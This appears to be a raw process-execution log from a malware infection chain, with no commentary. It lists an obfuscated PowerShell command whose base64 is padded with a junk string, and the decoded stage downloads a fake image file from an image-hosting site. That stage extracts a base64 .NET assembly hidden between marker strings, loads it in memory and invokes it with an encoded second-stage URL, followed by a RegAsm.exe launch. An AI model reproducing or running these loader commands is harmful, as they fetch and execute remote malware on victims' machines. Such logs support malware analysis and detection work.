powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JmcURONçuXSBpmcURONçuXSG0mcURONçuXSYQBnmcURONçuXSGUmcURONçuXSVQBymcURONçuXSGwmcURONçuXSImcURONçuXSmcURONçuXS9mcURONçuXSCmcURONçuXSmcURONçuXSJwBomcURONçuXSHQmcURONçuXSdmcURONçuXSBwmcURONçuXSHMmcURONçuXSOgmcURONçuXSvmcURONçuXSC8mcURONçuXSaQBtmcURONçuXSGEmcURONçuXSZwBlmcURONçuXSHUmcURONçuXScmcURONçuXSBsmcURONçuXSG8mcURONçuXSYQBkmcURONçuXSC4mcURONçuXSaQBvmcURONçuXSC8mcURONçuXSaQBimcURONçuXSC8mcURONçuXSdwBzmcURONçuXSDgmcURONçuXSTQBBmcURONçuXSEomcURONçuXSNgBlmcURONçuXSHmcURONçuXSmcURONçuXSdmcURONçuXSBpmcURONçuXSEwmcURONçuXSZgBHmcURONçuXSHUmcURONçuXSXwmcURONçuXSxmcURONçuXSDYmcURONçuXSOQmcURONçuXS3mcURONçuXSDcmcURONçuXSMwmcURONçuXS4mcURONçuXSDQmcURONçuXSOQmcURONçuXSymcURONçuXSC4mcURONçuXSagBwmcURONçuXSGcmcURONçuXSJwmcURONçuXS7mcURONçuXSCQmcURONçuXSdwBlmcURONçuXSGImcURONçuXSQwBsmcURONçuXSGkmcURONçuXSZQBumcURONçuXSHQmcURONçuXSImcURONçuXSmcURONçuXS9mcURONçuXSCmcURONçuXSmcURONçuXSTgBlmcURONçuXSHcmcURONçuXSLQBPmcURONçuXSGImcURONçuXSagBlmcURONçuXSGMmcURONçuXSdmcURONçuXSmcURONçuXSgmcURONçuXSFMmcURONçuXSeQBzmcURONçuXSHQmcURONçuXSZQBtmcURONçuXSC4mcURONçuXSTgBlmcURONçuXSHQmcURONçuXSLgBXmcURONçuXSGUmcURONçuXSYgBDmcURONçuXSGwmcURONçuXSaQBlmcURONçuXSG4mcURONçuXSdmcURONçuXSmcURONçuXS7mcURONçuXSCQmcURONçuXSaQBtmcURONçuXSGEmcURONçuXSZwBlmcURONçuXSEImcURONçuXSeQB0mcURONçuXSGUmcURONçuXScwmcURONçuXSgmcURONçuXSD0mcURONçuXSImcURONçuXSmcURONçuXSkmcURONçuXSHcmcURONçuXSZQBimcURONçuXSEMmcURONçuXSbmcURONçuXSBpmcURONçuXSGUmcURONçuXSbgB0mcURONçuXSC4mcURONçuXSRmcURONçuXSBvmcURONçuXSHcmcURONçuXSbgBsmcURONçuXSG8mcURONçuXSYQBkmcURONçuXSEQmcURONçuXSYQB0mcURONçuXSGEmcURONçuXSKmcURONçuXSmcURONçuXSkmcURONçuXSGkmcURONçuXSbQBhmcURONçuXSGcmcURONçuXSZQBVmcURONçuXSHImcURONçuXSbmcURONçuXSmcURONçuXSpmcURONçuXSDsmcURONçuXSJmcURONçuXSBpmcURONçuXSG0mcURONçuXSYQBnmcURONçuXSGUmcURONçuXSVmcURONçuXSBlmcURONçuXSHgmcURONçuXSdmcURONçuXSmcURONçuXSgmcURONçuXSD0mcURONçuXSImcURONçuXSBbmcURONçuXSFMmcURONçuXSeQBzmcURONçuXSHQmcURONçuXSZQBtmcURONçuXSC4mcURONçuXSVmcURONçuXSBlmcURONçuXSHgmcURONçuXSdmcURONçuXSmcURONçuXSumcURONçuXSEUmcURONçuXSbgBjmcURONçuXSG8mcURONçuXSZmcURONçuXSBpmcURONçuXSG4mcURONçuXSZwBdmcURONçuXSDomcURONçuXSOgBVmcURONçuXSFQmcURONçuXSRgmcURONçuXS4mcURONçuXSC4mcURONçuXSRwBlmcURONçuXSHQmcURONçuXSUwB0mcURONçuXSHImcURONçuXSaQBumcURONçuXSGcmcURONçuXSKmcURONçuXSmcURONçuXSkmcURONçuXSGkmcURONçuXSbQBhmcURONçuXSGcmcURONçuXSZQBCmcURONçuXSHkmcURONçuXSdmcURONçuXSBlmcURONçuXSHMmcURONçuXSKQmcURONçuXS7mcURONçuXSCQmcURONçuXScwB0mcURONçuXSGEmcURONçuXScgB0mcURONçuXSEYmcURONçuXSbmcURONçuXSBhmcURONçuXSGcmcURONçuXSImcURONçuXSmcURONçuXS9mcURONçuXSCmcURONçuXSmcURONçuXSJwmcURONçuXS8mcURONçuXSDwmcURONçuXSQgBBmcURONçuXSFMmcURONçuXSRQmcURONçuXS2mcURONçuXSDQmcURONçuXSXwBTmcURONçuXSFQmcURONçuXSQQBSmcURONçuXSFQmcURONçuXSPgmcURONçuXS+mcURONçuXSCcmcURONçuXSOwmcURONçuXSkmcURONçuXSGUmcURONçuXSbgBkmcURONçuXSEYmcURONçuXSbmcURONçuXSBhmcURONçuXSGcmcURONçuXSImcURONçuXSmcURONçuXS9mcURONçuXSCmcURONçuXSmcURONçuXSJwmcURONçuXS8mcURONçuXSDwmcURONçuXSQgBBmcURONçuXSFMmcURONçuXSRQmcURONçuXS2mcURONçuXSDQmcURONçuXSXwBFmcURONçuXSE4mcURONçuXSRmcURONçuXSmcURONçuXS+mcURONçuXSD4mcURONçuXSJwmcURONçuXS7mcURONçuXSCQmcURONçuXScwB0mcURONçuXSGEmcURONçuXScgB0mcURONçuXSEkmcURONçuXSbgBkmcURONçuXSGUmcURONçuXSemcURONçuXSmcURONçuXSgmcURONçuXSD0mcURONçuXSImcURONçuXSmcURONçuXSkmcURONçuXSGkmcURONçuXSbQBhmcURONçuXSGcmcURONçuXSZQBUmcURONçuXSGUmcURONçuXSemcURONçuXSB0mcURONçuXSC4mcURONçuXSSQBumcURONçuXSGQmcURONçuXSZQB4mcURONçuXSE8mcURONçuXSZgmcURONçuXSomcURONçuXSCQmcURONçuXScwB0mcURONçuXSGEmcURONçuXScgB0mcURONçuXSEYmcURONçuXSbmcURONçuXSBhmcURONçuXSGcmcURONçuXSKQmcURONçuXS7mcURONçuXSCQmcURONçuXSZQBumcURONçuXSGQmcURONçuXSSQBumcURONçuXSGQmcURONçuXSZQB4mcURONçuXSCmcURONçuXSmcURONçuXSPQmcURONçuXSgmcURONçuXSCQmcURONçuXSaQBtmcURONçuXSGEmcURONçuXSZwBlmcURONçuXSFQmcURONçuXSZQB4mcURONçuXSHQmcURONçuXSLgBJmcURONçuXSG4mcURONçuXSZmcURONçuXSBlmcURONçuXSHgmcURONçuXSTwBmmcURONçuXSCgmcURONçuXSJmcURONçuXSBlmcURONçuXSG4mcURONçuXSZmcURONçuXSBGmcURONçuXSGwmcURONçuXSYQBnmcURONçuXSCkmcURONçuXSOwmcURONçuXSkmcURONçuXSHMmcURONçuXSdmcURONçuXSBhmcURONçuXSHImcURONçuXSdmcURONçuXSBJmcURONçuXSG4mcURONçuXSZmcURONçuXSBlmcURONçuXSHgmcURONçuXSImcURONçuXSmcURONçuXStmcURONçuXSGcmcURONçuXSZQmcURONçuXSgmcURONçuXSDmcURONçuXSmcURONçuXSImcURONçuXSmcURONçuXStmcURONçuXSGEmcURONçuXSbgBkmcURONçuXSCmcURONçuXSmcURONçuXSJmcURONçuXSBlmcURONçuXSG4mcURONçuXSZmcURONçuXSBJmcURONçuXSG4mcURONçuXSZmcURONçuXSBlmcURONçuXSHgmcURONçuXSImcURONçuXSmcURONçuXStmcURONçuXSGcmcURONçuXSdmcURONçuXSmcURONçuXSgmcURONçuXSCQmcURONçuXScwB0mcURONçuXSGEmcURONçuXScgB0mcURONçuXSEkmcURONçuXSbgBkmcURONçuXSGUmcURONçuXSemcURONçuXSmcURONçuXS7mcURONçuXSCQmcURONçuXScwB0mcURONçuXSGEmcURONçuXScgB0mcURONçuXSEkmcURONçuXSbgBkmcURONçuXSGUmcURONçuXSemcURONçuXSmcURONçuXSgmcURONçuXSCsmcURONçuXSPQmcURONçuXSgmcURONçuXSCQmcURONçuXScwB0mcURONçuXSGEmcURONçuXScgB0mcURONçuXSEYmcURONçuXSbmcURONçuXSBhmcURONçuXSGcmcURONçuXSLgBMmcURONçuXSGUmcURONçuXSbgBnmcURONçuXSHQmcURONçuXSamcURONçuXSmcURONçuXS7mcURONçuXSCQmcURONçuXSYgBhmcURONçuXSHMmcURONçuXSZQmcURONçuXS2mcURONçuXSDQmcURONçuXSTmcURONçuXSBlmcURONçuXSG4mcURONçuXSZwB0mcURONçuXSGgmcURONçuXSImcURONçuXSmcURONçuXS9mcURONçuXSCmcURONçuXSmcURONçuXSJmcURONçuXSBlmcURONçuXSG4mcURONçuXSZmcURONçuXSBJmcURONçuXSG4mcURONçuXSZmcURONçuXSBlmcURONçuXSHgmcURONçuXSImcURONçuXSmcURONçuXStmcURONçuXSCmcURONçuXSmcURONçuXSJmcURONçuXSBzmcURONçuXSHQmcURONçuXSYQBymcURONçuXSHQmcURONçuXSSQBumcURONçuXSGQmcURONçuXSZQB4mcURONçuXSDsmcURONçuXSJmcURONçuXSBimcURONçuXSGEmcURONçuXScwBlmcURONçuXSDYmcURONçuXSNmcURONçuXSBDmcURONçuXSG8mcURONçuXSbQBtmcURONçuXSGEmcURONçuXSbgBkmcURONçuXSCmcURONçuXSmcURONçuXSPQmcURONçuXSgmcURONçuXSCQmcURONçuXSaQBtmcURONçuXSGEmcURONçuXSZwBlmcURONçuXSFQmcURONçuXSZQB4mcURONçuXSHQmcURONçuXSLgBTmcURONçuXSHUmcURONçuXSYgBzmcURONçuXSHQmcURONçuXScgBpmcURONçuXSG4mcURONçuXSZwmcURONçuXSomcURONçuXSCQmcURONçuXScwB0mcURONçuXSGEmcURONçuXScgB0mcURONçuXSEkmcURONçuXSbgBkmcURONçuXSGUmcURONçuXSemcURONçuXSmcURONçuXSsmcURONçuXSCmcURONçuXSmcURONçuXSJmcURONçuXSBimcURONçuXSGEmcURONçuXScwBlmcURONçuXSDYmcURONçuXSNmcURONçuXSBMmcURONçuXSGUmcURONçuXSbgBnmcURONçuXSHQmcURONçuXSamcURONçuXSmcURONçuXSpmcURONçuXSDsmcURONçuXSJmcURONçuXSBjmcURONçuXSG8mcURONçuXSbQBtmcURONçuXSGEmcURONçuXSbgBkmcURONçuXSEImcURONçuXSeQB0mcURONçuXSGUmcURONçuXScwmcURONçuXSgmcURONçuXSD0mcURONçuXSImcURONçuXSBbmcURONçuXSFMmcURONçuXSeQBzmcURONçuXSHQmcURONçuXSZQBtmcURONçuXSC4mcURONçuXSQwBvmcURONçuXSG4mcURONçuXSdgBlmcURONçuXSHImcURONçuXSdmcURONçuXSBdmcURONçuXSDomcURONçuXSOgBGmcURONçuXSHImcURONçuXSbwBtmcURONçuXSEImcURONçuXSYQBzmcURONçuXSGUmcURONçuXSNgmcURONçuXS0mcURONçuXSFMmcURONçuXSdmcURONçuXSBymcURONçuXSGkmcURONçuXSbgBnmcURONçuXSCgmcURONçuXSJmcURONçuXSBimcURONçuXSGEmcURONçuXScwBlmcURONçuXSDYmcURONçuXSNmcURONçuXSBDmcURONçuXSG8mcURONçuXSbQBtmcURONçuXSGEmcURONçuXSbgBkmcURONçuXSCkmcURONçuXSOwmcURONçuXSkmcURONçuXSGwmcURONçuXSbwBhmcURONçuXSGQmcURONçuXSZQBkmcURONçuXSEEmcURONçuXScwBzmcURONçuXSGUmcURONçuXSbQBimcURONçuXSGwmcURONçuXSeQmcURONçuXSgmcURONçuXSD0mcURONçuXSImcURONçuXSBbmcURONçuXSFMmcURONçuXSeQBzmcURONçuXSHQmcURONçuXSZQBtmcURONçuXSC4mcURONçuXSUgBlmcURONçuXSGYmcURONçuXSbmcURONçuXSBlmcURONçuXSGMmcURONçuXSdmcURONçuXSBpmcURONçuXSG8mcURONçuXSbgmcURONçuXSumcURONçuXSEEmcURONçuXScwBzmcURONçuXSGUmcURONçuXSbQBimcURONçuXSGwmcURONçuXSeQBdmcURONçuXSDomcURONçuXSOgBMmcURONçuXSG8mcURONçuXSYQBkmcURONçuXSCgmcURONçuXSJmcURONçuXSBjmcURONçuXSG8mcURONçuXSbQBtmcURONçuXSGEmcURONçuXSbgBkmcURONçuXSEImcURONçuXSeQB0mcURONçuXSGUmcURONçuXScwmcURONçuXSpmcURONçuXSDsmcURONçuXSJmcURONçuXSB0mcURONçuXSHkmcURONçuXScmcURONçuXSBlmcURONçuXSCmcURONçuXSmcURONçuXSPQmcURONçuXSgmcURONçuXSCQmcURONçuXSbmcURONçuXSBvmcURONçuXSGEmcURONçuXSZmcURONçuXSBlmcURONçuXSGQmcURONçuXSQQBzmcURONçuXSHMmcURONçuXSZQBtmcURONçuXSGImcURONçuXSbmcURONçuXSB5mcURONçuXSC4mcURONçuXSRwBlmcURONçuXSHQmcURONçuXSVmcURONçuXSB5mcURONçuXSHmcURONçuXSmcURONçuXSZQmcURONçuXSomcURONçuXSCcmcURONçuXSRgBpmcURONçuXSGImcURONçuXSZQBymcURONçuXSC4mcURONçuXSSmcURONçuXSBvmcURONçuXSG0mcURONçuXSZQmcURONçuXSnmcURONçuXSCkmcURONçuXSOwmcURONçuXSkmcURONçuXSG0mcURONçuXSZQB0mcURONçuXSGgmcURONçuXSbwBkmcURONçuXSCmcURONçuXSmcURONçuXSPQmcURONçuXSgmcURONçuXSCQmcURONçuXSdmcURONçuXSB5mcURONçuXSHmcURONçuXSmcURONçuXSZQmcURONçuXSumcURONçuXSEcmcURONçuXSZQB0mcURONçuXSE0mcURONçuXSZQB0mcURONçuXSGgmcURONçuXSbwBkmcURONçuXSCgmcURONçuXSJwBWmcURONçuXSEEmcURONçuXSSQmcURONçuXSnmcURONçuXSCkmcURONçuXSLgBJmcURONçuXSG4mcURONçuXSdgBvmcURONçuXSGsmcURONçuXSZQmcURONçuXSomcURONçuXSCQmcURONçuXSbgB1mcURONçuXSGwmcURONçuXSbmcURONçuXSmcURONçuXSsmcURONçuXSCmcURONçuXSmcURONçuXSWwBvmcURONçuXSGImcURONçuXSagBlmcURONçuXSGMmcURONçuXSdmcURONçuXSBbmcURONçuXSF0mcURONçuXSXQmcURONçuXSgmcURONçuXSCgmcURONçuXSJwBkmcURONçuXSEgmcURONçuXSamcURONçuXSmcURONçuXSwmcURONçuXSEwmcURONçuXSbgBomcURONçuXSHmcURONçuXSmcURONçuXSYgBpmcURONçuXSDgmcURONçuXSemcURONçuXSBOmcURONçuXSFMmcURONçuXSNmcURONçuXSB6mcURONçuXSE0mcURONçuXSeQmcURONçuXS0mcURONçuXSHkmcURONçuXSTgBDmcURONçuXSDQmcURONçuXSegBPmcURONçuXSFQmcURONçuXSRQB2mcURONçuXSEwmcURONçuXSegBwmcURONçuXSHcmcURONçuXSZmcURONçuXSBImcURONçuXSFImcURONçuXSbwmcURONçuXSnmcURONçuXSCmcURONçuXSmcURONçuXSLmcURONçuXSmcURONçuXSgmcURONçuXSCcmcURONçuXSZmcURONçuXSBmmcURONçuXSGQmcURONçuXSZgBkmcURONçuXSCcmcURONçuXSImcURONçuXSmcURONçuXSsmcURONçuXSCmcURONçuXSmcURONçuXSJwBkmcURONçuXSGYmcURONçuXSZmcURONçuXSBmmcURONçuXSCcmcURONçuXSImcURONçuXSmcURONçuXSsmcURONçuXSCmcURONçuXSmcURONçuXSJwBkmcURONçuXSGYmcURONçuXSZmcURONçuXSBmmcURONçuXSCcmcURONçuXSImcURONçuXSmcURONçuXSsmcURONçuXSCmcURONçuXSmcURONçuXSJwBkmcURONçuXSGEmcURONçuXSZmcURONçuXSBzmcURONçuXSGEmcURONçuXSJwmcURONçuXSgmcURONçuXSCwmcURONçuXSImcURONçuXSmcURONçuXSnmcURONçuXSGQmcURONçuXSZQmcURONçuXSnmcURONçuXSCmcURONçuXSmcURONçuXSLmcURONçuXSmcURONçuXSgmcURONçuXSCcmcURONçuXSYwB1mcURONçuXSCcmcURONçuXSKQmcURONçuXSpmcURONçuXSmcURONçuXS==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('mcURONçuXS','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
1776powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lnhpbi8xNS4zMy4yNC4zOTEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
2364RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
1684